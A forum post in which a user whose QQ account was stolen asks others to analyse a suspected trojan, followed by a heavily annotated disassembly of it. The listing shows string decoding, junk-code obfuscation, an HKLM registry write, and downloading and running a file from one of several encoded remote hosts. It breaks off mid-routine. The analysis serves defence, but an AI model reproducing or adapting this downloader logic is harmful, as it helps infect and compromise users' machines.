这个病毒没有加密。我用OLLYDBG打开看了一下,看不出明确的地址。
但从瑞星的报警来看,是偷密码的。
昨天已经把我的QQ偷了,把QQ号昵称改成了骂人的话,如果不是密码保护,我这QQ早已不保。
--反汇编代码如下,谁能帮忙分析一下这个家伙把我的密码发到哪个邮箱或主页了?
; ---------------------------------------------------------------------------
; L000 -- main routine of the sample. The startup code pushes four arguments
; and calls it; it returns with `retn 10` (hex, callee pops 16 bytes).
; All numbers in this listing are hexadecimal.
;
; What the visible code does, in order:
;   1. L654 adds 5 to every byte of twelve strings in the data section,
;      i.e. the strings are stored encoded and are decoded in place.
;   2. L698 builds a path object at [ebp-158] (special folder + file name).
;   3. L391 creates keys and one value under HKEY_LOCAL_MACHINE.
;   4. Up to four attempts: pick one of four decoded strings at random,
;      format a URL, and let L1268 fetch it and save it to the path.
;   5. If a fetch succeeded, the saved file is started with CreateProcessA.
; No call in this routine sends mail or uploads data. The remote addresses
; are the strings at 00403130/00403160/00403190/004031C0; their bytes are
; not part of this listing, so they cannot be read from the code alone.
;
; Stack object at [ebp-158], as used by L698/L789/L898/L1127/L763:
;   +000  path buffer          +104  number of bytes received
;   +108  handle from InternetOpenA   +10C  handle from InternetOpenUrlA
; ---------------------------------------------------------------------------
L000:
push ebp
mov ebp, esp
sub esp, 5F0
push ebx
push esi
push edi
; table A, four string pointers at [ebp-3C]..[ebp-30]; one of them becomes
; a sprintf argument for the URL further down
mov dword ptr [ebp-3C], 00403130
mov dword ptr [ebp-38], 00403160
mov dword ptr [ebp-34], 00403190
mov dword ptr [ebp-30], 004031C0
; table B, seven string pointers at [ebp-1C]..[ebp-4]; the first six are the
; registry names pushed by L391, the last (004031F0) is appended to the
; format string below
mov dword ptr [ebp-1C], 004031FA
mov dword ptr [ebp-18], 00403203
mov dword ptr [ebp-14], 00403227
mov dword ptr [ebp-10], 0040322F
mov dword ptr [ebp-C], 00403235
mov dword ptr [ebp-8], 0040323D
mov dword ptr [ebp-4], 004031F0
; [ebp-44] = overall result, starts at 0
mov dword ptr [ebp-44], 0
; filler: all four registers are saved and restored, the arithmetic result
; is discarded (only the flags change)
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
; decode the string at 00403247 in place (L654 adds 5 to each byte)
push 00403247
call L654
add esp, 4
; construct the path object: ecx = object, argument = the string just decoded,
; which L698 appends to the folder path
push 00403247
lea ecx, dword ptr [ebp-158]
call L698
; for (i = 0; i < 4; i++) decode table A entry i
mov dword ptr [ebp-40], 0
jmp L043
L040:
mov eax, dword ptr [ebp-40]
add eax, 1
mov dword ptr [ebp-40], eax
L043:
cmp dword ptr [ebp-40], 4
jnb L051
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ebp+ecx*4-3C]
push edx
call L654
add esp, 4
jmp L040
L051:
; filler calls: atoi, ceil, div, isalnum, isalpha on constant arguments.
; The div result is stored at [ebp-5D0]/[ebp-5CC] and not read again in this
; routine. The same group of calls recurs several times below and in L391
; and L1268.
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5D0], eax
mov dword ptr [ebp-5CC], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
; for (i = 0; i < 7; i++) decode table B entry i
mov dword ptr [ebp-40], 0
jmp L076
L073:
mov eax, dword ptr [ebp-40]
add eax, 1
mov dword ptr [ebp-40], eax
L076:
cmp dword ptr [ebp-40], 7
jnb L084
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ebp+ecx*4-1C]
push edx
call L654
add esp, 4
jmp L073
L084:
; filler: ebx saved, modified, restored
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
; registry step; a zero return ends the program without any network activity
call L391
test eax, eax
jnz L098
mov eax, dword ptr [ebp-44]
mov dword ptr [ebp-5D4], eax
lea ecx, dword ptr [ebp-158]
call L763
mov eax, dword ptr [ebp-5D4]
jmp L385
L098:
; js/jns to the same label: one of the two is always taken, so the next two
; lines are never executed. They are stray bytes that the disassembler
; decoded as instructions. The same trick (js/jns, jb/jnb, je/jnz followed
; by a few bytes) is repeated throughout the listing.
js L102
jns L102
sbb byte ptr [ebx], al
adc dh, byte ptr [ebx]
L102:
; used[4] at [ebp-2C]..[ebp-20] = 0: marks which table A entries were tried
mov dword ptr [ebp-2C], 0
xor ecx, ecx
mov dword ptr [ebp-28], ecx
mov dword ptr [ebp-24], ecx
mov dword ptr [ebp-20], ecx
; [ebp-48] = attempt counter
mov dword ptr [ebp-48], 0
L108:
; leave the loop after four attempts (compares the value before increment)
mov edx, dword ptr [ebp-48]
mov eax, dword ptr [ebp-48]
add eax, 1
mov dword ptr [ebp-48], eax
cmp edx, 4
jge L273
; filler calls, see L051
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5DC], eax
mov dword ptr [ebp-5D8], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
; srand(time(0)); idx = rand() % 4  (signed remainder sequence)
push 0
call time
add esp, 4
push eax
call srand
add esp, 4
call rand
and eax, 80000003
jns L146
dec eax
or eax, FFFFFFFC
inc eax
L146:
; [ebp-264] = idx, [ebp-260] = probe counter
mov dword ptr [ebp-264], eax
mov dword ptr [ebp-260], 0
L148:
; at most four probes: find an entry not yet marked in used[], starting at
; idx and stepping (idx + 1) % 4
mov ecx, dword ptr [ebp-260]
mov edx, dword ptr [ebp-260]
add edx, 1
mov dword ptr [ebp-260], edx
cmp ecx, 4
jge L170
mov eax, dword ptr [ebp-264]
cmp dword ptr [ebp+eax*4-2C], 0
je L166
mov ecx, dword ptr [ebp-264]
add ecx, 1
and ecx, 80000003
jns L164
dec ecx
or ecx, FFFFFFFC
inc ecx
L164:
mov dword ptr [ebp-264], ecx
jmp L169
L166:
; free entry found: mark it and stop probing
mov edx, dword ptr [ebp-264]
mov dword ptr [ebp+edx*4-2C], 1
jmp L170
L169:
jmp L148
L170:
; filler calls, see L051
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5E4], eax
mov dword ptr [ebp-5E0], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
; build the sprintf format string in the buffer at [ebp-25C]:
; copy three bytes from 00403118, zero the rest of the buffer ...
mov ax, word ptr [403118]
mov word ptr [ebp-25C], ax
mov cl, byte ptr [40311A]
mov byte ptr [ebp-25A], cl
mov ecx, 40
xor eax, eax
lea edi, dword ptr [ebp-259]
rep stos dword ptr es:[edi]
stos byte ptr es:[edi]
; ... append the string at 004031F0 (inline strcat: measure source, find end
; of destination, copy including the terminator) ...
mov edi, 004031F0
lea edx, dword ptr [ebp-25C]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
add edi, -1
mov ecx, ebx
shr ecx, 2
rep movs dword ptr es:[edi], dword ptr [esi]
mov ecx, ebx
and ecx, 3
rep movs byte ptr es:[edi], byte ptr [esi]
; ... and append the string at 00403118 once more.
; NOTE(review): 00403118 is presumably "%s", giving "%s<004031F0>%s";
; the data bytes are not in the listing -- confirm in the data section.
mov edi, 00403118
lea edx, dword ptr [ebp-25C]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
add edi, -1
mov ecx, ebx
shr ecx, 2
rep movs dword ptr es:[edi], dword ptr [esi]
mov ecx, ebx
and ecx, 3
rep movs byte ptr es:[edi], byte ptr [esi]
; zero the buffer at [ebp-368] and write C389 (decimal 50057) into it as a
; base-10 string
mov byte ptr [ebp-368], 0
mov ecx, 40
xor eax, eax
lea edi, dword ptr [ebp-367]
rep stos dword ptr es:[edi]
stos word ptr es:[edi]
stos byte ptr es:[edi]
push 0A
lea eax, dword ptr [ebp-368]
push eax
push 0C389
call _itoa
add esp, 0C
; sprintf([ebp-570], format, tableA[idx], "50057") -> the URL to request
lea ecx, dword ptr [ebp-368]
push ecx
mov edx, dword ptr [ebp-264]
mov eax, dword ptr [ebp+edx*4-3C]
push eax
lea ecx, dword ptr [ebp-25C]
push ecx
lea edx, dword ptr [ebp-570]
push edx
call sprintf
add esp, 10
; L1268(object, url, 0): fetch the URL and save it to the object's path;
; the result becomes [ebp-44]
push 0
lea eax, dword ptr [ebp-570]
push eax
lea ecx, dword ptr [ebp-158]
call L1268
mov dword ptr [ebp-44], eax
cmp dword ptr [ebp-44], 0
je L272
jmp L273
L272:
; fetch failed: next attempt
jmp L108
L273:
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
; nothing was saved -> skip the launch and clean up
cmp dword ptr [ebp-44], 0
je L380
; jb/jnb pair: always jumps to L286; the lines up to L286 are stray bytes
jb L286
jnb L286
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L286:
; [ebp-584] = address of the path buffer (start of the object)
lea ecx, dword ptr [ebp-158]
mov dword ptr [ebp-584], ecx
; filler: ecx and edx are restored; ebx is not saved here and ends up
; incremented by 2
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
; zero 11 (hex) dwords at [ebp-5C8] and store 44 in the first one: a
; STARTUPINFO with cb = 44 and every other field zero
mov ecx, 11
xor eax, eax
lea edi, dword ptr [ebp-5C8]
rep stos dword ptr es:[edi]
mov dword ptr [ebp-5C8], 44
; zero the four dwords at [ebp-580]: PROCESS_INFORMATION
xor edx, edx
mov dword ptr [ebp-580], edx
mov dword ptr [ebp-57C], edx
mov dword ptr [ebp-578], edx
mov dword ptr [ebp-574], edx
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
; CreateProcessA(NULL, path, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi):
; the saved file is run using its path as the command line
lea eax, dword ptr [ebp-580]
push eax
lea ecx, dword ptr [ebp-5C8]
push ecx
push 0
push 0
push 0
push 0
push 0
push 0
mov edx, dword ptr [ebp-584]
push edx
push 0
call CreateProcessA
test eax, eax
jnz L346
jmp L380
L346:
; filler calls, see L051
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5EC], eax
mov dword ptr [ebp-5E8], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
; result = 1; close the process and thread handles from PROCESS_INFORMATION
mov dword ptr [ebp-44], 1
mov eax, dword ptr [ebp-580]
push eax
call CloseHandle
mov ecx, dword ptr [ebp-57C]
push ecx
call CloseHandle
; je/jnz pair: always jumps to L380; the lines up to L380 are stray bytes
je L380
jnz L380
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L380:
; common exit: keep the result, let L763 close the object's two internet
; handles, return the result
mov edx, dword ptr [ebp-44]
mov dword ptr [ebp-5F0], edx
lea ecx, dword ptr [ebp-158]
call L763
mov eax, dword ptr [ebp-5F0]
L385:
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10
; ---------------------------------------------------------------------------
; L391 -- registry routine. No arguments, plain `retn`.
; Out: eax = 1 if RegOpenKeyA, RegSetValueExA and all four RegCreateKeyA
;      calls returned 0 (success), otherwise 0.
;
; Calls made, with the key/value names taken from the strings L000 decoded:
;   h0 = open   HKEY_LOCAL_MACHINE \ <004031FA>
;   h1 = create h0 \ <00403203>
;        set    h1 value <00403227> = "50057" (type 1, REG_SZ)
;   h2 = create h1 \ <0040322F>, closed
;   h2 = create h1 \ <00403235>, closed
;   h2 = create h1 \ <0040323D>
; The names themselves are data bytes that this listing does not contain.
; For triage, a string value "50057" under a key created in HKLM is the host
; artefact this routine leaves behind.
;
; The routine uses an _except_handler3 frame; [ebp-4] is the try level and
; L576 is the cleanup block that closes the three key handles.
; ---------------------------------------------------------------------------
L391:
push ebp
mov ebp, esp
push -1
push 004020C0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
add esp, -124
push ebx
push esi
push edi
; [ebp-28] = result = 0
mov dword ptr [ebp-28], 0
; zero the buffer at [ebp-12C], then write C389 (decimal 50057) as a string
mov byte ptr [ebp-12C], 0
mov ecx, 3F
xor eax, eax
lea edi, dword ptr [ebp-12B]
rep stos dword ptr es:[edi]
stos word ptr es:[edi]
stos byte ptr es:[edi]
push 0A
lea eax, dword ptr [ebp-12C]
push eax
push 0C389
call _itoa
add esp, 0C
; [ebp-24] = strlen(buffer), later passed as the value's byte count
lea edi, dword ptr [ebp-12C]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
add ecx, -1
mov dword ptr [ebp-24], ecx
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
; RegOpenKeyA(80000002 = HKEY_LOCAL_MACHINE, <004031FA>, &[ebp-2C])
lea ecx, dword ptr [ebp-2C]
push ecx
push 004031FA
push 80000002
call RegOpenKeyA
test eax, eax
je L436
; open failed: return the result (still 0) without entering the try block
mov eax, dword ptr [ebp-28]
jmp L632
L436:
; NOTE(review): the single-byte `wait` here and at L572 looks like more
; filler -- confirm against the raw bytes
wait
; try level 0
mov dword ptr [ebp-4], 0
; filler: ecx and edx are restored; ebx is not saved here and ends up
; incremented by 2
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
; RegCreateKeyA(h0, <00403203>, &[ebp-1C])
lea edx, dword ptr [ebp-1C]
push edx
push 00403203
mov eax, dword ptr [ebp-2C]
push eax
call RegCreateKeyA
test eax, eax
je L458
jmp L572
L458:
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
; RegSetValueExA(h1, <00403227>, 0, 1, "50057", strlen)
mov ecx, dword ptr [ebp-24]
push ecx
lea edx, dword ptr [ebp-12C]
push edx
push 1
push 0
push 00403227
mov eax, dword ptr [ebp-1C]
push eax
call RegSetValueExA
test eax, eax
je L491
jmp L572
L491:
; jb/jnb pair: always jumps to L499; the lines up to L499 are stray bytes
jb L499
jnb L499
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L499:
; RegCreateKeyA(h1, <0040322F>, &[ebp-20])
lea ecx, dword ptr [ebp-20]
push ecx
push 0040322F
mov edx, dword ptr [ebp-1C]
push edx
call RegCreateKeyA
test eax, eax
je L508
jmp L572
L508:
mov eax, dword ptr [ebp-20]
push eax
call RegCloseKey
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
; RegCreateKeyA(h1, <00403235>, &[ebp-20])
lea ecx, dword ptr [ebp-20]
push ecx
push 00403235
; the disassembler lost sync on the next three lines: the bytes are
; 8B 55 E4 52, which decode as `mov edx, dword ptr [ebp-1C]` / `push edx`,
; the same argument setup as before the other RegCreateKeyA calls
db 8B
push ebp
in al, 52
call RegCreateKeyA
test eax, eax
je L541
jmp L572
L541:
; filler: ecx and edx are restored; ebx is not saved here and ends up
; incremented by 2
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
mov eax, dword ptr [ebp-20]
push eax
call RegCloseKey
; je/jnz pair: always jumps to L562; the lines up to L562 are stray bytes
je L562
jnz L562
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L562:
; RegCreateKeyA(h1, <0040323D>, &[ebp-20])
lea ecx, dword ptr [ebp-20]
push ecx
push 0040323D
mov edx, dword ptr [ebp-1C]
push edx
call RegCreateKeyA
test eax, eax
je L571
jmp L572
L571:
; every call succeeded: result = 1
mov dword ptr [ebp-28], 1
L572:
wait
; leave the try block and run the cleanup block once
mov dword ptr [ebp-4], -1
call L576
jmp L631
L576:
; cleanup block: close each key handle whose slot is non-zero
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
cmp dword ptr [ebp-2C], 0
je L595
mov eax, dword ptr [ebp-2C]
push eax
call RegCloseKey
L595:
cmp dword ptr [ebp-1C], 0
je L600
mov ecx, dword ptr [ebp-1C]
push ecx
call RegCloseKey
L600:
; filler calls (atoi, ceil, div, isalnum, isalpha on constants)
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-134], eax
mov dword ptr [ebp-130], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
cmp dword ptr [ebp-20], 0
je L625
mov edx, dword ptr [ebp-20]
push edx
call RegCloseKey
L625:
; filler: ebx saved and restored
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
retn
L631:
mov eax, dword ptr [ebp-28]
L632:
; unlink the exception frame and return
mov ecx, dword ptr [ebp-10]
mov dword ptr fs:[0], ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; padding between functions
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
; ---------------------------------------------------------------------------
; L654 -- in-place string decoder. One stack argument, caller cleans up
; (every call site is followed by `add esp, 4`).
; In:  [ebp+8] = pointer to a NUL-terminated byte string
; Out: eax = 1; every byte before the terminator has had 5 added to it
; An analyst reading the data section statically has to apply the same +5
; to the stored bytes to see the strings the program actually uses.
; ---------------------------------------------------------------------------
L654:
push ebp
mov ebp, esp
push ebx
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
; ecx = string pointer; an empty string skips the loop
mov ecx, dword ptr [ebp+8]
mov al, byte ptr [ecx]
test al, al
je L687
L681:
; *p += 5; advance; stop at the terminating zero byte
add al, 5
mov byte ptr [ecx], al
mov al, byte ptr [ecx+1]
inc ecx
test al, al
jnz L681
L687:
; filler: ebx saved and restored
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov eax, 1
pop ebx
pop ebp
retn
nop
nop
; ---------------------------------------------------------------------------
; L698 -- initialises the path object.
; In:  ecx = object, [ebp+8] = string to append (callee pops it, `retn 4`)
; Out: eax = object
; Clears the two handle fields (+108, +10C), asks the shell for a special
; folder path into the start of the object, then appends the argument to it.
; Folder id 2D is CSIDL_COMMON_TEMPLATES in the Windows headers, and the
; last argument 1 asks for the folder to be created if missing. The result
; is the file path later used by CreateFileA (L1127) and CreateProcessA
; (L000).
; ---------------------------------------------------------------------------
L698:
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
; [ebp-4] = object pointer
mov dword ptr [ebp-4], ecx
mov eax, dword ptr [ebp-4]
mov dword ptr [eax+108], 0
mov ecx, dword ptr [ebp-4]
mov dword ptr [ecx+10C], 0
; js/jns pair: always jumps to L713; the next two lines are stray bytes
js L713
jns L713
sbb byte ptr [ebx], al
adc dh, byte ptr [ebx]
L713:
; SHGetSpecialFolderPathA(NULL, object, 2D, 1)
push 1
push 2D
mov edx, dword ptr [ebp-4]
push edx
push 0
call SHGetSpecialFolderPathA
; inline strcat(object, argument): measure the source including its
; terminator, find the end of the destination, copy
mov edi, dword ptr [ebp+8]
mov edx, dword ptr [ebp-4]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
add edi, -1
mov ecx, ebx
shr ecx, 2
rep movs dword ptr es:[edi], dword ptr [esi]
mov ecx, ebx
and ecx, 3
rep movs byte ptr es:[edi], byte ptr [esi]
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
mov eax, dword ptr [ebp-4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; padding between functions
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
; ---------------------------------------------------------------------------
; L763 -- releases the path object's network handles.
; In:  ecx = object. No stack arguments.
; Calls the function held in edi on [object+108] and on [object+10C] when
; the field is non-zero.
; ---------------------------------------------------------------------------
L763:
push esi
mov esi, ecx
push edi
; the dump dropped the destination operand on the next line; since the calls
; below go through edi, it is presumably a load of the InternetCloseHandle
; import address into edi
mov InternetCloseHandle
mov eax, dword ptr [esi+108]
test eax, eax
je L772
push eax
call edi
L772:
mov esi, dword ptr [esi+10C]
test esi, esi
je L777
push esi
call edi
L777:
pop edi
pop esi
retn
; padding between functions
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
; L789 -- opens the WinINet session.
; In:  ecx = object, [ebp+8] = proxy name or 0 (callee pops it, `retn 4`)
; Out: eax = 1 if InternetOpenA returned a handle, else 0
; The handle is stored at [object+108]. The agent string is at 00403120; it
; is not one of the strings passed to the decoder, and its bytes are not in
; this listing. It appears in the User-Agent header of the request, which
; makes it a candidate network indicator.
; ---------------------------------------------------------------------------
L789:
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
; [ebp-8] = object pointer
mov dword ptr [ebp-8], ecx
; je/jnz pair: always jumps to L803; the lines up to L803 are stray bytes
je L803
jnz L803
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L803:
; access type [ebp-4]: 3 (INTERNET_OPEN_TYPE_PROXY) when a proxy name was
; given, 0 (INTERNET_OPEN_TYPE_PRECONFIG) otherwise
cmp dword ptr [ebp+8], 0
je L807
mov dword ptr [ebp-4], 3
jmp L808
L807:
mov dword ptr [ebp-4], 0
L808:
; InternetOpenA(<00403120>, access type, proxy, NULL, 0)
push 0
push 0
mov eax, dword ptr [ebp+8]
push eax
mov ecx, dword ptr [ebp-4]
push ecx
push 00403120
call InternetOpenA
mov edx, dword ptr [ebp-8]
mov dword ptr [edx+108], eax
mov eax, dword ptr [ebp-8]
cmp dword ptr [eax+108], 0
jnz L823
xor eax, eax
jmp L832
L823:
; jb/jnb pair: always jumps to L831; the lines up to L831 are stray bytes
jb L831
jnb L831
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L831:
mov eax, 1
L832:
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; padding between functions
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
; ---------------------------------------------------------------------------
; L848 -- reads the response's Content-Length.
; In:  ecx = object. No stack arguments.
; Out: eax = atol() of the header text, or 0 if HttpQueryInfoA failed
; Info level 5 is HTTP_QUERY_CONTENT_LENGTH. The caller (L898) uses the
; returned number as the size of the download buffer.
; ---------------------------------------------------------------------------
L848:
push ebp
mov ebp, esp
sub esp, 404
push ebx
mov edx, ecx
push edi
; zero the 400-byte buffer at [ebp-404]; [ebp-4] = buffer size (400)
mov ecx, 100
xor eax, eax
lea edi, dword ptr [ebp-404]
mov dword ptr [ebp-4], 400
rep stos dword ptr es:[edi]
; filler: ebx saved and restored
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
; HttpQueryInfoA([object+10C], 5, buffer, &size, NULL); eax is still 0 from
; the xor above, so the first push supplies the NULL index argument
mov edx, dword ptr [edx+10C]
push eax
lea eax, dword ptr [ebp-4]
lea ecx, dword ptr [ebp-404]
push eax
push ecx
push 5
push edx
call HttpQueryInfoA
test eax, eax
jnz L880
; query failed: return with eax = 0
pop edi
pop ebx
mov esp, ebp
pop ebp
retn
L880:
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
; convert the header text to a number
lea eax, dword ptr [ebp-404]
push eax
call atol
add esp, 4
pop edi
pop ebx
mov esp, ebp
pop ebp
retn
; padding between functions
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
; L898 -- downloads a URL into a freshly allocated buffer.
; In:  ecx = object, [ebp+8] = URL string, [ebp+C] = address that receives
;      the buffer pointer (callee pops both, `retn 8`)
; Out: eax = 1 when the number of bytes read reached the Content-Length,
;      else 0. On success [object+104] holds the byte count and the caller
;      owns the buffer; on a read error the buffer is freed here.
; Uses an _except_handler3 frame; L1085 is the cleanup block.
;
; Locals: [ebp-40] object, [ebp-28] content length, [ebp-2C] write pointer,
;         [ebp-1C] bytes read so far, [ebp-24] bytes available,
;         [ebp-30] bytes returned by the last read, [ebp-20] result.
; ---------------------------------------------------------------------------
L898:
push ebp
mov ebp, esp
push -1
push 004020D0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
add esp, -30
push ebx
push esi
push edi
mov dword ptr [ebp-40], ecx
mov dword ptr [ebp-20], 0
mov dword ptr [ebp-1C], 0
mov dword ptr [ebp-2C], 0
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
; try level 0
mov dword ptr [ebp-4], 0
; jb/jnb pair: always jumps to L943; the lines up to L943 are stray bytes
jb L943
jnb L943
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L943:
; InternetOpenUrlA([object+108], url, NULL, 0, 80000000, 0);
; 80000000 is INTERNET_FLAG_RELOAD (fetch from the server, not the cache)
push 0
push 80000000
push 0
push 0
mov eax, dword ptr [ebp+8]
push eax
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+108]
push edx
call InternetOpenUrlA
mov ecx, dword ptr [ebp-40]
mov dword ptr [ecx+10C], eax
mov edx, dword ptr [ebp-40]
cmp dword ptr [edx+10C], 0
jnz L959
jmp L1082
L959:
; je/jnz pair: always jumps to L966; the lines up to L966 are stray bytes
je L966
jnz L966
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L966:
; content length from the response headers; 0 is treated as failure
mov ecx, dword ptr [ebp-40]
call L848
mov dword ptr [ebp-28], eax
cmp dword ptr [ebp-28], 0
jnz L972
jmp L1082
L972:
; filler: ecx and edx are restored; ebx is not saved here and ends up
; incremented by 2
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
; *out = operator new(content length); a null result is treated as failure
mov eax, dword ptr [ebp-28]
push eax
call L1322
add esp, 4
mov dword ptr [ebp-34], eax
mov ecx, dword ptr [ebp+C]
mov edx, dword ptr [ebp-34]
mov dword ptr [ecx], edx
mov eax, dword ptr [ebp+C]
cmp dword ptr [eax], 0
jnz L995
jmp L1082
L995:
; zero-fill the buffer, then set the write pointer to its start
mov ecx, dword ptr [ebp-28]
xor eax, eax
mov edx, dword ptr [ebp+C]
mov edi, dword ptr [edx]
mov edx, ecx
shr ecx, 2
rep stos dword ptr es:[edi]
mov ecx, edx
and ecx, 3
rep stos byte ptr es:[edi]
mov eax, dword ptr [ebp+C]
mov ecx, dword ptr [eax]
mov dword ptr [ebp-2C], ecx
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
L1011:
; read loop: continue while bytes read < content length (unsigned compare)
mov edx, dword ptr [ebp-1C]
cmp edx, dword ptr [ebp-28]
jnb L1078
; js/jns pair: always jumps to L1018; the next two lines are stray bytes
js L1018
jns L1018
sbb byte ptr [ebx], al
adc dh, byte ptr [ebx]
L1018:
; InternetQueryDataAvailable([object+10C], &available, 0, 0)
push 0
push 0
lea eax, dword ptr [ebp-24]
push eax
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+10C]
push edx
call InternetQueryDataAvailable
test eax, eax
jnz L1036
; query failed: free the buffer (L1321 = operator delete) and give up
mov eax, dword ptr [ebp+C]
mov ecx, dword ptr [eax]
mov dword ptr [ebp-38], ecx
mov edx, dword ptr [ebp-38]
push edx
call L1321
add esp, 4
jmp L1082
L1036:
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
; InternetReadFile([object+10C], write pointer, available, &returned).
; The requested size is the available count as reported; this code does not
; compare it with the space left in the buffer.
mov dword ptr [ebp-30], 0
lea eax, dword ptr [ebp-30]
push eax
mov ecx, dword ptr [ebp-24]
push ecx
mov edx, dword ptr [ebp-2C]
push edx
mov eax, dword ptr [ebp-40]
mov ecx, dword ptr [eax+10C]
push ecx
call InternetReadFile
test eax, eax
jnz L1071
; read failed: free the buffer and give up
mov edx, dword ptr [ebp+C]
mov eax, dword ptr [edx]
mov dword ptr [ebp-3C], eax
